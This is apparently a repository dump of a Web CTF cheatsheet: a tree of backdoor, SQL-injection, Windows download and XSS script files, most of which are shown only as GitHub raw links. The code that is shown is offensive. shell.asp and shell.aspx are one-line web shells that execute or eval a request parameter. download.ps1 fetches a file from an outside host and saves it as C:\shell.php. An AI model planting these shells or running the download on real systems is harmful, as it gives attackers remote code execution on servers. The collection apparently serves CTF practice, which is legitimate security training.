├── README.md └── scripts ├── backdoor ├── bypass_mail_shellshock.php ├── get_flag.php ├── php-jpeg-shell.php ├── shell.asp ├── shell.aspx ├── shell.php └── uploader.php ├── others ├── IP.py ├── secret_key_base_decrypt.rb └── ssltest.py ├── sqlinj ├── mssql_column.rb ├── mssql_table.rb ├── mysql_time.rb ├── mysql_union.rb ├── mysql_useragent.rb └── sqlite_login.rb ├── windows ├── download.bat ├── download.ps1 └── download.vbs └── xss └── payload /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/README.md -------------------------------------------------------------------------------- /scripts/backdoor/bypass_mail_shellshock.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/backdoor/bypass_mail_shellshock.php -------------------------------------------------------------------------------- /scripts/backdoor/get_flag.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/backdoor/get_flag.php -------------------------------------------------------------------------------- /scripts/backdoor/php-jpeg-shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/backdoor/php-jpeg-shell.php -------------------------------------------------------------------------------- /scripts/backdoor/shell.asp: -------------------------------------------------------------------------------- 1 | <%execute request("gg")%> 2 | -------------------------------------------------------------------------------- /scripts/backdoor/shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 2 | -------------------------------------------------------------------------------- /scripts/backdoor/shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scripts/backdoor/uploader.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/backdoor/uploader.php -------------------------------------------------------------------------------- /scripts/others/IP.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/others/IP.py -------------------------------------------------------------------------------- /scripts/others/secret_key_base_decrypt.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/others/secret_key_base_decrypt.rb -------------------------------------------------------------------------------- /scripts/others/ssltest.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/others/ssltest.py -------------------------------------------------------------------------------- /scripts/sqlinj/mssql_column.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/sqlinj/mssql_column.rb -------------------------------------------------------------------------------- /scripts/sqlinj/mssql_table.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/sqlinj/mssql_table.rb -------------------------------------------------------------------------------- /scripts/sqlinj/mysql_time.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/sqlinj/mysql_time.rb -------------------------------------------------------------------------------- /scripts/sqlinj/mysql_union.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/sqlinj/mysql_union.rb -------------------------------------------------------------------------------- /scripts/sqlinj/mysql_useragent.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/sqlinj/mysql_useragent.rb -------------------------------------------------------------------------------- /scripts/sqlinj/sqlite_login.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/sqlinj/sqlite_login.rb -------------------------------------------------------------------------------- /scripts/windows/download.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/windows/download.bat -------------------------------------------------------------------------------- /scripts/windows/download.ps1: -------------------------------------------------------------------------------- 1 | $c=new-object System.Net.WebClient;$c.DownloadFile('http://file.kaibro.tw/s','C:\shell.php') 2 | -------------------------------------------------------------------------------- /scripts/windows/download.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/windows/download.vbs -------------------------------------------------------------------------------- /scripts/xss/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/w181496/Web-CTF-Cheatsheet/HEAD/scripts/xss/payload --------------------------------------------------------------------------------